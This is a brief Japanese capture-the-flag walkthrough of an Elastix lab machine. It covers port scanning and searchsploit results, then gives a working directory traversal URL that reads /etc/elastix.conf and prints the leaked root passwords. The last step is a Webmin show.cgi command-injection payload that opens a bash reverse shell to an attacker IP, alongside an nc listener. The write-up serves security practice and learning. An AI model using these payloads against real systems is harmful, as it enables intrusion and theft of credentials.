大まかに
- Nmap
- Search exploit
- Directory Traversal
- Reverse Shell
Nmap
22/tcp ssh 4.3 25/tcp smtp 80/tcp http 2.2.3 110/tcp pop3 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 111/tcp rpcbind #100000) 143/tcp imap 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 443/tcp ssl/http 2.2.3 878/tcp status #100024) 993/tcp ssl/imap 995/tcp pop3 3306/tcp mysql 4190/tcp sieve 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 4445/tcp upnotifyp? 4559/tcp HylaFAX 4.3.10 5038/tcp Asterisk Call Manager 1.1 10000/tcp http MiniServ 1.570 (Webmin httpd)
▼それぞれのWebアプリ - https://10.10.10.7/ Elastix
- https://10.10.10.7:10000/ webmin
Search Sploit
- Elastix
Elastix - 'page' Cross-Site Scripting | php/webapps/38078.py Elastix - Multiple Cross-Site Scripting Vulne | php/webapps/38544.txt Elastix 2.0.2 - Multiple Cross-Site Scripting | php/webapps/34942.txt Elastix 2.2.0 - 'graph.php' Local File Inclus | php/webapps/37637.pl Elastix 2.x - Blind SQL Injection | php/webapps/36305.txt Elastix < 2.5 - PHP Code Injection | php/webapps/38091.php
https://10.10.10.7/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../../../../../etc/elastix.conf%00
▼結果 mysqlrootpwd=jEhdIekWmdjE cyrususerpwd=jEhdIekWmdjE amiadminpwd=jEhdIekWmdjE
- このパスワードを利用してWebminにログインして以下のPayloadを実行
https://10.10.10.7:10000/file/show.cgi/bin/aaabbbcccc%7C/bin/bash%20i%20%3E&%20/dev/tcp/10.10.16.2/4444%200%3E&1%7C
この際に4444でポートリッスン
# nc -lnvp 4444